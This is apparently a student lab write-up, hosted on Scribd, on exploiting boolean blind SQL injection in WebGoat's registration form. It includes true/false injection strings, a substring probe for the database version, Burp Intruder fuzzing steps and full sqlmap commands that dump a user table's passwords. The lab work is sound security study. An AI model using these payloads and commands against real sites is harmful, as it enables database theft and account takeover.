Scribd
Upload
33 views6 pages

Taskk 2

Uploaded by

Ritik
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
33 views6 pages

Taskk 2

Uploaded by

Ritik
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

Wireshark /Webgoat

Introduction : Learn about common web application vulnerabilities by analyzing a simple web
application. This task will help you understand how attackers can exploit weaknesses in web
applications.

As both the registration and the login worked fine with the new user, I can assume that both the
form values I sent over for these two operations where resulting in valid SQL queries.

So what happen if I try to send them again with some attached SQLi test?

newuser' AND '1'='1


From this response I understand that the app is checking if the username already exists by running
the query we provided, thus this statement is a valid TRUE statement since the username already
exists

newuser' and '1'='2


Hence this is a valid FALSE statement.

This is all we need to ask the database for all its data, as long as the db user is allowed to read them.

In lesson #4 we were given a hint on this problem

AND substring(database_version(),1,1) = '2

By varying the position argument for substring() and the literal value we can then loop through all
positions and see what matches, we can find subsequent character positions of the database values
by using Burp Intruder, this can be done by using a sniper attack on the §2§ with a list such
as https://github.com/xmendez/wfuzz/blob/master/wordlist/stress/alphanum_case_extra.txt and
see what request returns a TRUE statement
The database value is 2.5.0 on my WebGoat install

I then wanted to automate with sqlmap and see what I could get from the db.

The simplest way I know in order to give sqlmap a proper request is to

 submit the initial request and get the response for a TRUE statement from the browser

 copy them from Burp

 use the request as input file and the response as string parameter for the TRUE statement in
sqlmap

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
threads 1
current DB is PUBLIC + Boolean Blind SQL

Let’s try to get the table names

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
thread=10 --technique=B --dbms="HSQLDB" -D PUBLIC --tables --level=5 --risk=3

I would then start by looking at the CHALLENGE_USERS table

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
thread=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS --columns --level=5 --
risk=3
sqlmap asking permission to brute force column names with its wordlist and the result

And get the table rows, this time I have to lower the number of threads due to the number or errors I
was getting with 10 threads on my machine

sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --
thread=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS -C userid,password --
dump --level=5 --risk=3

CHALLENGE_USERS table and Tom password

Now we have username and password for Tom and can login on the lesson login form

You might also like